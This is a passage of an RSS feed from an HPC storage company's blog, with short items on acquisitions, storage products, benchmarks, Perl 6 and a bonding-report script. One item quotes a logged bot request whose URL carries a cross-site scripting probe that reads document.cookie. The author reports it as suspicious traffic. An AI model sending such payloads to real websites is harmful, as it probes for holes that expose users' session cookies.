      <description>We&amp;rsquo;ve got customers with very large resource machines. And software that sees all those resources and goes &amp;ldquo;gimme!!!!&amp;rdquo;. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that &amp;ldquo;there must be something wrong with the hardware&amp;rdquo;, when I see all the messages in console logs being pulled in from ICL saying &amp;ldquo;zOMG I am out of ram &amp;hellip;.</description>
    </item>
    
    <item>
      <title>&#34;Unexpected&#34; cloud storage retrieval charges, or &#34;RTFM&#34;</title>
      <link>https://blog.scalability.org/2016/01/unexpected-cloud-storage-retrieval-charges-or-rtfm/</link>
      <pubDate>Mon, 18 Jan 2016 13:14:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/unexpected-cloud-storage-retrieval-charges-or-rtfm/</guid>
      <description>An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon&amp;rsquo;s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.</description>
    </item>
    
    <item>
      <title>Container jutsu</title>
      <link>https://blog.scalability.org/2016/01/container-jutsu/</link>
      <pubDate>Wed, 13 Jan 2016 04:54:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/container-jutsu/</guid>
      <description>Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don&amp;rsquo;t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.</description>
    </item>
    
    <item>
      <title>Hard filtering of calls</title>
      <link>https://blog.scalability.org/2016/01/hard-filtering-of-calls/</link>
      <pubDate>Mon, 11 Jan 2016 18:38:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/hard-filtering-of-calls/</guid>
      <description>I find that, over time, my cell phone number has propagated out to spammers/scammers who want to call me up to sell me something. The US national do-not-call registry hasn&amp;rsquo;t helped. The complaints I&amp;rsquo;ve filed haven&amp;rsquo;t helped. So I filter. My filtering algo looks like this:
if (number_is_known_person_or_org(phone_number)) {
    take_call_if_possible();
} else if (number_is_unknown(phone_number)) {
    filter_stage_2(phone_number);
}

function filter_stage_2(phone_number) {
    // I ignore 80% of numbers I don&#39;t know, let them go to
    // voicemail.</description>
    </item>
    
    <item>
      <title>Nutanix files for IPO</title>
      <link>https://blog.scalability.org/2015/12/nutanix-files-for-ipo/</link>
      <pubDate>Wed, 23 Dec 2015 14:56:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/nutanix-files-for-ipo/</guid>
      <description>Short story here. I am not going to pore over their S-1 form to find interesting tidbits; others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition, stopped this conversation. So now Nutanix is going to IPO.</description>
    </item>
    
    <item>
      <title>Toshiba contemplating spinning out NAND flash</title>
      <link>https://blog.scalability.org/2015/12/toshiba-contemplating-spinning-out-nand-flash/</link>
      <pubDate>Wed, 23 Dec 2015 14:39:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/toshiba-contemplating-spinning-out-nand-flash/</guid>
      <description>This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we&amp;rsquo;ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).</description>
    </item>
    
    <item>
      <title>Google GMail is broken, not passing emails, losing others</title>
      <link>https://blog.scalability.org/2015/12/google-gmail-is-broken-not-passing-emails-losing-others/</link>
      <pubDate>Tue, 22 Dec 2015 23:00:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/google-gmail-is-broken-not-passing-emails-losing-others/</guid>
      <description>Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it, for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn&amp;rsquo;t have to worry about email management any more. Now I have to worry about pissed off customers who are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.</description>
    </item>
    
    <item>
      <title>M&amp;A:  NetApp grabs SolidFire</title>
      <link>https://blog.scalability.org/2015/12/ma-netapp-grabs-solidfire/</link>
      <pubDate>Tue, 22 Dec 2015 15:36:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/ma-netapp-grabs-solidfire/</guid>
      <description>This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline, certainly with respect to dumb JBODs and smart &amp;ldquo;filer heads&amp;rdquo;. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.</description>
    </item>
    
    <item>
      <title>Good read on market sizing for VCs and entrepreneurs</title>
      <link>https://blog.scalability.org/2015/12/good-read-on-market-sizing-for-vcs-and-entrepreneurs/</link>
      <pubDate>Tue, 15 Dec 2015 12:37:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/good-read-on-market-sizing-for-vcs-and-entrepreneurs/</guid>
      <description>Not a how to guide, but a higher level meta discussion &amp;hellip; about that market size discussion. See here. I&amp;rsquo;ve experienced the endless cycle of meetings over &amp;ldquo;size of market&amp;rdquo;. Not fun. These days, I have a very simple classifier with respect to investors.
foreach investor (list_of_investors) {
    if (investor-&amp;gt;says_yes_sends_term_sheet_and_check) {
        put_money_to_work_building_value()
    } else {
        add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money()
    }
}
This is pseudo code for the algo you need. Any answer which is yes is good.</description>
    </item>
    
    <item>
      <title>Bots on Amazon?</title>
      <link>https://blog.scalability.org/2015/12/bots-on-amazon/</link>
      <pubDate>Mon, 14 Dec 2015 22:38:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/bots-on-amazon/</guid>
      <description>Seeing lots of these in my web server logs:
https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E  which are sent there from a sentinel redirection mechanism on a different web server. A number, maybe 10 or so? Amazon hosts are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone&amp;rsquo;s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.</description>
    </item>
    
    <item>
      <title>Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot</title>
      <link>https://blog.scalability.org/2015/12/watching-dracut-udev-systemd-and-plymouth-all-battle-each-other-for-nfsramboot/</link>
      <pubDate>Thu, 10 Dec 2015 19:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/watching-dracut-udev-systemd-and-plymouth-all-battle-each-other-for-nfsramboot/</guid>
      <description>I can&amp;rsquo;t even begin to describe the complete and utter broken-ness of this mess. This doesn&amp;rsquo;t look like a systemd issue; it&amp;rsquo;s just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not &amp;hellip; settle &amp;hellip; is &amp;hellip; amusing. While it&amp;rsquo;s doing that, the dracut options of debug, drop to a shell, break, etc. aren&amp;rsquo;t working. This isn&amp;rsquo;t engineering at this point.</description>
    </item>
    
    <item>
      <title>#Perl6 compiler betas are ready</title>
      <link>https://blog.scalability.org/2015/12/perl6-compiler-betas-are-ready/</link>
      <pubDate>Sat, 05 Dec 2015 17:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/perl6-compiler-betas-are-ready/</guid>
      <description>Ok &amp;hellip; I am &amp;hellip; well &amp;hellip; blown away. I had thought Perl6 would be the Duke Nukem Forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say &amp;ldquo;why perl&amp;rdquo; or &amp;ldquo;why perl6&amp;rdquo; or &amp;ldquo;why now, because we have #insert(language_x) and it&amp;rsquo;s wonderful&amp;rdquo;. Good question; I wasn&amp;rsquo;t sure why it was relevant, until I started reading some of the code.</description>
    </item>
    
    <item>
      <title>Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage</title>
      <link>https://blog.scalability.org/2015/12/testing-a-new-scalableinfo-unison-ceph-appliance-node-for-hpc-storage/</link>
      <pubDate>Sat, 05 Dec 2015 16:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/testing-a-new-scalableinfo-unison-ceph-appliance-node-for-hpc-storage/</guid>
      <description>Simple test case, no file system &amp;hellip; using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
  0   1  95   5   0   0| 513M    0 | 480B    0 |   0     0 | 10k   20k
  4   2  94   0   0   0|   0     0 | 480B    0 |   0     0 |5238   721
  0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4913   352
  0   2  98   0   0   0|   0     0 | 570B   90B|   0     0 |4966   613
  0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4912   413
  0   2  98   0   0   0|   0     0 | 584B   92B|   0     0 |4965   334
  0   2  98   0   0   0|   0     0 | 480B    0 |   0     0 |4914   306
  0   2  98   0   0   0|   0     0 | 636B  147B|   0     0 |4969   483
  0   2  98   0   0   0|   0     0 | 570B    0 |   0     0 |4915   377
  8   8  50  32   0   2|7520k 8382M| 578B    0 |   0     0 | 76k  215k
  9   7  30  52   0   3|8332k   12G| 960B  132B|   0     0 | 109k  279k
 10   5  29  53   0   2|4136k   12G| 240B    0 |   0     0 | 109k  277k
 12   6  29  51   0   2|4208k   12G| 240B    0 |   0     0 | 108k  280k
 11   6  31  50   0   2|2244k   12G| 330B   90B|   0     0 | 109k  281k
 11   6  30  50   0   3|2272k   13G| 240B    0 |   0     0 | 110k  281k
Writes around 12.</description>
    </item>
    
    <item>
      <title>10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others</title>
      <link>https://blog.scalability.org/2015/12/10tb-pmr-drives-for-unison-hpc-storage-systems-think-600tb4u-unit-with-beegfs-ceph-and-others/</link>
      <pubDate>Thu, 03 Dec 2015 02:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/10tb-pmr-drives-for-unison-hpc-storage-systems-think-600tb4u-unit-with-beegfs-ceph-and-others/</guid>
      <description>WD/HGST just released details on a PMR (aka &amp;ldquo;real&amp;rdquo;, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB per 4U unit, or up to 6PB per rack of 10 Unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And that&amp;rsquo;s before we leverage the distributed journaling/metadata NVMe devices rear-mounted on the units.</description>
    </item>
    
    <item>
      <title>Video interview: face melting performance in #hpc #nvme #storage @scalableinfo</title>
      <link>https://blog.scalability.org/2015/12/video-interview-face-melting-performance-in-hpc-nvme-storage-scalableinfo/</link>
      <pubDate>Tue, 01 Dec 2015 20:47:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/video-interview-face-melting-performance-in-hpc-nvme-storage-scalableinfo/</guid>
      <description>Oh no &amp;hellip; we didn&amp;rsquo;t say &amp;ldquo;face melting&amp;rdquo; &amp;hellip; did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich&amp;rsquo;s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.</description>
    </item>
    
    <item>
      <title>There are no silver bullets, 2015 edition</title>
      <link>https://blog.scalability.org/2015/11/there-are-no-silver-bullets-2015-edition/</link>
      <pubDate>Wed, 25 Nov 2015 17:53:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/there-are-no-silver-bullets-2015-edition/</guid>
      <description>In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big &amp;hellip; uh &amp;hellip; &amp;ldquo;data&amp;rdquo; ?) into golden nuggets of actionable data. Many of the &amp;ldquo;solutions&amp;rdquo; marketed these days are exactly like that &amp;hellip; &amp;ldquo;add our magic bean software to your pipeline and you will gain insight faster.</description>
    </item>
    
    <item>
      <title>The 1980s called and want their software licensing models back</title>
      <link>https://blog.scalability.org/2015/11/the-1980s-called-and-want-their-software-licensing-models-back/</link>
      <pubDate>Wed, 25 Nov 2015 17:29:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/the-1980s-called-and-want-their-software-licensing-models-back/</guid>
      <description>So here I am, the day before Thanksgiving, fighting a battle with a reluctant license server that wants to compute a hash of internal bits on a machine, in order to unlock a license key to let software run. This is not for us, but for a customer. At their site. This is the same model from the 1980s and early 90s. Create a hash from a collection of things (or a dongle you attach to a serial/parallel port).</description>
    </item>
    
    <item>
      <title>I always thought a Ph.D. defense should have a dance component</title>
      <link>https://blog.scalability.org/2015/11/i-always-thought-a-ph-d-defense-should-have-a-dance-component/</link>
      <pubDate>Wed, 25 Nov 2015 14:50:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/i-always-thought-a-ph-d-defense-should-have-a-dance-component/</guid>
      <description>As seen here. I like the enTANGOeled photons. Not sure how I&amp;rsquo;d do mine, but it&amp;rsquo;s at least amusing to think through.</description>
    </item>
    
    <item>
      <title>A wonderful read on metrics, profiling, benchmarking</title>
      <link>https://blog.scalability.org/2015/11/a-wonderful-read-on-metrics-profiling-benchmarking/</link>
      <pubDate>Tue, 24 Nov 2015 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/a-wonderful-read-on-metrics-profiling-benchmarking/</guid>
      <description>Brendan Gregg&amp;rsquo;s writings are always interesting and informative. I just saw a link on Hacker News to a presentation he gave on &amp;ldquo;Broken Performance Tools&amp;rdquo;. It is wonderful, and succinctly explains many things I&amp;rsquo;ve talked about here and elsewhere, but it goes far beyond what I&amp;rsquo;ve grumbled over. One of my favorite points in there is slide 83. &amp;ldquo;Most popular benchmarks are flawed&amp;rdquo; and a pointer to a paper (easy to google for).</description>
    </item>
    
    <item>
      <title>Massive Unapologetic Firepower part 3:  Forte</title>
      <link>https://blog.scalability.org/2015/11/massive-unapologetic-firepower-part-3-forte/</link>
      <pubDate>Wed, 18 Nov 2015 22:53:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/massive-unapologetic-firepower-part-3-forte/</guid>
      <description>Forte has uncloaked; the website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads &amp;hellip;
That is, 5+ million IOPS. The price point for this is $50k for 48TB, about $1/GB. Pre-order now; shipping in a few weeks.</description>
    </item>
    
    <item>
      <title>Shiny #HPC #storage things at #SC15</title>
      <link>https://blog.scalability.org/2015/11/shiny-hpc-storage-things-at-sc15/</link>
      <pubDate>Tue, 10 Nov 2015 13:58:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/shiny-hpc-storage-things-at-sc15/</guid>
      <description>Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test and saw 20GB/s &amp;hellip; it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.</description>
    </item>
    
    <item>
      <title>Moving inventory out to make room for new stuff</title>
      <link>https://blog.scalability.org/2015/10/moving-inventory-out-to-make-room-for-new-stuff/</link>
      <pubDate>Thu, 29 Oct 2015 20:56:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/moving-inventory-out-to-make-room-for-new-stuff/</guid>
      <description>We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some &amp;hellip; the team is building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.</description>
    </item>
    
    <item>
      <title>Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up</title>
      <link>https://blog.scalability.org/2015/10/cat-peeking-out-of-bag-schedule-of-presentations-and-talks-in-our-booth-for-sc15-is-up/</link>
      <pubDate>Thu, 29 Oct 2015 12:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/cat-peeking-out-of-bag-schedule-of-presentations-and-talks-in-our-booth-for-sc15-is-up/</guid>
      <description>I mentioned previously that we have some new (shiny) things &amp;hellip; and it looks like you&amp;rsquo;ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific lineup of people giving talks:
* Fintan Quill from Kx on kdb+ &amp;hellip; an awesome, market-leading Big Data time series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS &amp;hellip; the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph &amp;hellip; the reliable block and object storage system that we&amp;rsquo;ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.</description>
    </item>
    
    <item>
      <title>sios-metrics core rewritten</title>
      <link>https://blog.scalability.org/2015/10/sios-metrics-core-rewritten/</link>
      <pubDate>Tue, 27 Oct 2015 05:15:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/sios-metrics-core-rewritten/</guid>
      <description>This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.</description>
    </item>
    
    <item>
      <title>Just give me a huge fast storage system, and a mighty network to deliver it by</title>
      <link>https://blog.scalability.org/2015/10/just-give-me-a-huge-fast-storage-system-and-a-mighty-network-to-delivery-it-by/</link>
      <pubDate>Fri, 23 Oct 2015 19:56:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/just-give-me-a-huge-fast-storage-system-and-a-mighty-network-to-delivery-it-by/</guid>
      <description>A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
 In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days &amp;hellip; this would not be a win.</description>
    </item>
    
    <item>
      <title>Looking forward to showing off a new product at SC15</title>
      <link>https://blog.scalability.org/2015/10/looking-forward-to-showing-off-a-new-product-at-sc15/</link>
      <pubDate>Thu, 22 Oct 2015 15:13:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/looking-forward-to-showing-off-a-new-product-at-sc15/</guid>
      <description>Think &amp;hellip; pretty interesting performance &amp;hellip; Think very &amp;hellip; very dense &amp;hellip; Think &amp;hellip; there may be some benchies leaked here soon.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Huge ... WD acquires SanDisk</title>
      <link>https://blog.scalability.org/2015/10/ma-huge-wd-acquires-sandisk/</link>
      <pubDate>Wed, 21 Oct 2015 15:16:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-huge-wd-acquires-sandisk/</guid>
      <description>This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok &amp;hellip; so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.</description>
    </item>
    
    <item>
      <title>Finding needles in haystacks covered in a fallen down barn</title>
      <link>https://blog.scalability.org/2015/10/finding-needles-in-haystacks-covered-in-a-fallen-down-barn/</link>
      <pubDate>Sat, 17 Oct 2015 00:54:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/finding-needles-in-haystacks-covered-in-a-fallen-down-barn/</guid>
      <description>Ok &amp;hellip; this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems &amp;hellip; being one where the interrupt handler catches an exception, and then you start piling up softirq contexts. It&amp;rsquo;s on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can&amp;rsquo;t assign blame for this as I don&amp;rsquo;t know who is at fault.</description>
    </item>
    
    <item>
      <title>Ten years ago this blog was born</title>
      <link>https://blog.scalability.org/2015/10/ten-years-ago-this-blog-was-born/</link>
      <pubDate>Thu, 15 Oct 2015 03:02:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ten-years-ago-this-blog-was-born/</guid>
      <description>This was my first post. On 12-October-2005. I&amp;rsquo;ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I&amp;rsquo;ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.</description>
    </item>
    
    <item>
      <title>M&amp;A:  EMC gobbled by Dell</title>
      <link>https://blog.scalability.org/2015/10/ma-emc-gobbled-by-dell/</link>
      <pubDate>Mon, 12 Oct 2015 15:57:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-emc-gobbled-by-dell/</guid>
      <description>Need to think how this will play out. The Register&amp;rsquo;s take is here. It seems that this will solve the &amp;ldquo;shareholder value&amp;rdquo; problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won&amp;rsquo;t protest), Dell will have</description>
    </item>
    
    <item>
      <title>The end of java in the browser</title>
      <link>https://blog.scalability.org/2015/10/the-end-of-java-in-the-browser/</link>
      <pubDate>Sat, 10 Oct 2015 21:08:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/the-end-of-java-in-the-browser/</guid>
      <description>Coming soon. Mozilla is turning off NPAPI support at the end of next year. Java and Java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow Flash. Which is less good. What is interesting about this is that it sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM-like capabilities.</description>
    </item>
    
    <item>
      <title>Are the wheels coming off?</title>
      <link>https://blog.scalability.org/2015/10/are-the-wheels-coming-off/</link>
      <pubDate>Fri, 09 Oct 2015 12:26:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/are-the-wheels-coming-off/</guid>
      <description>From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns &amp;hellip; neither one will last very long. Pure Storage IPOed this week and they aren&amp;rsquo;t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren&amp;rsquo;t a good company, or don&amp;rsquo;t have a good product. This is saying that the demand for &amp;ldquo;unicorn&amp;rdquo; valuations from the buy side is &amp;hellip; well &amp;hellip; weak.</description>
    </item>
    
    <item>
      <title>possible M&amp;A:  Dell and EMC?</title>
      <link>https://blog.scalability.org/2015/10/possible-ma-dell-and-emc/</link>
      <pubDate>Thu, 08 Oct 2015 00:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/possible-ma-dell-and-emc/</guid>
      <description>Story is here. Not sure this is a great tie up &amp;hellip; EMC has lots of things Dell doesn&amp;rsquo;t need (and vice versa). Possibly parts of EMC (secession from the federation?) with Dell. I can&amp;rsquo;t imagine VMware wanting to tie up with one vendor. Nor Pivotal, etc. This said, Cisco pulled out of the venture with EMC to pursue its own directions, competitive with elements. But then they bought and subsequently closed Whiptail.</description>
    </item>
    
    <item>
      <title>End days must be on hand ... Perl 6 is out</title>
      <link>https://blog.scalability.org/2015/10/end-days-must-be-on-hand-perl-6-is-out/</link>
      <pubDate>Tue, 06 Oct 2015 23:10:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/end-days-must-be-on-hand-perl-6-is-out/</guid>
      <description>See here for more details. I&amp;rsquo;d love to find a valid reason to play with it, but my near-term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over &amp;hellip; as the correct response has been &amp;ldquo;what year&amp;rdquo;. Until this year, it seems.</description>
    </item>
    
    <item>
      <title>M&amp;A: Cleversafe is snarfed up by IBM</title>
      <link>https://blog.scalability.org/2015/10/ma-cleversafe-is-snarfed-up-by-ibm/</link>
      <pubDate>Mon, 05 Oct 2015 19:07:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-cleversafe-is-snarfed-up-by-ibm/</guid>
      <description>Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won&amp;rsquo;t be alone for long.</description>
    </item>
    
    <item>
      <title>Voting in HPCWire&#39;s readers choice awards are open, please vote!</title>
      <link>https://blog.scalability.org/2015/09/voting-in-hpcwires-readers-choice-awards-are-open-please-vote/</link>
      <pubDate>Wed, 23 Sep 2015 19:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/voting-in-hpcwires-readers-choice-awards-are-open-please-vote/</guid>
      <description>Our friends at Lucera are at number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write-in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR InfiniBand technology at number 14. Please do vote (early, not often).</description>
    </item>
    
    <item>
      <title>As the benchmark cooks</title>
      <link>https://blog.scalability.org/2015/09/as-the-benchmark-cooks/</link>
      <pubDate>Mon, 21 Sep 2015 19:44:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/as-the-benchmark-cooks/</guid>
      <description>We are involved in a fairly large benchmark for a potential customer. I won&amp;rsquo;t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.</description>
    </item>
    
    <item>
      <title>Inventory to sell to make room:  Cadence and several Unison/JackRabbits</title>
      <link>https://blog.scalability.org/2015/09/inventory-to-sell-to-make-room-cadence-and-several-unisonjackrabbits/</link>
      <pubDate>Fri, 18 Sep 2015 20:12:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/inventory-to-sell-to-make-room-cadence-and-several-unisonjackrabbits/</guid>
      <description>Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We&amp;rsquo;ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for &amp;hellip;
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We&amp;rsquo;ve got the portable petabyte unit available (albeit with less than 1 PB).</description>
    </item>
    
    <item>
      <title>Updated net-tools bits</title>
      <link>https://blog.scalability.org/2015/09/updated-net-tools-bits/</link>
      <pubDate>Tue, 08 Sep 2015 04:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/updated-net-tools-bits/</guid>
      <description>So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
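Under the hood, the bond state comes from the kernel, which exposes one text file per bond under /proc/net/bonding/. A minimal sketch of reading it (a simplified illustration, not the actual parsing in lsbond.pl):

```shell
#!/bin/sh
# Sketch of where lsbond.pl-style data originates: the Linux bonding
# driver exposes one text file per bond under /proc/net/bonding/.
# BOND_DIR is overridable so the sketch can be exercised on hosts
# without bonds; the grep field list is a simplified illustration.
BOND_DIR="${BOND_DIR:-/proc/net/bonding}"
for f in "$BOND_DIR"/*; do
    [ -e "$f" ] || continue          # hosts without bonds have no entries
    echo "=== $(basename "$f") ==="
    # pull out the fields a summary tool would report
    grep -E 'Bonding Mode|MII Status|Currently Active Slave|Slave Interface|Speed' "$f"
done
```

lsbond.pl gathers the same fields (plus driver/firmware data from ethtool) and condenses them into the per-bond summary shown below.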
root@unison-mgr-1:~/net-tools# ./lsbond.pl
bond0:  mac 0c:c4:7a:48:69:cb state up
        mode fault-tolerance (active-backup) xmit_hash layer2 0
        active slave eth1
        polling 100 ms up_delay 200 ms down_delay 200 ms
        slave nics:
          eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e
bond1:  mac 00:12:c0:80:26:76 state up
        mode fault-tolerance (active-backup) xmit_hash layer2 0
        active slave eth3
        polling 100 ms up_delay 200 ms down_delay 200 ms
        slave nics:
          eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.</description>
    </item>
    
    <item>
      <title>Unison Ceph beats reference architecture, including the flavor with NVMe drives</title>
      <link>https://blog.scalability.org/2015/09/unison-ceph-beats-reference-architecture-including-the-flavor-with-nvme-drives/</link>
      <pubDate>Wed, 02 Sep 2015 23:02:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/unison-ceph-beats-reference-architecture-including-the-flavor-with-nvme-drives/</guid>
      <description>The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
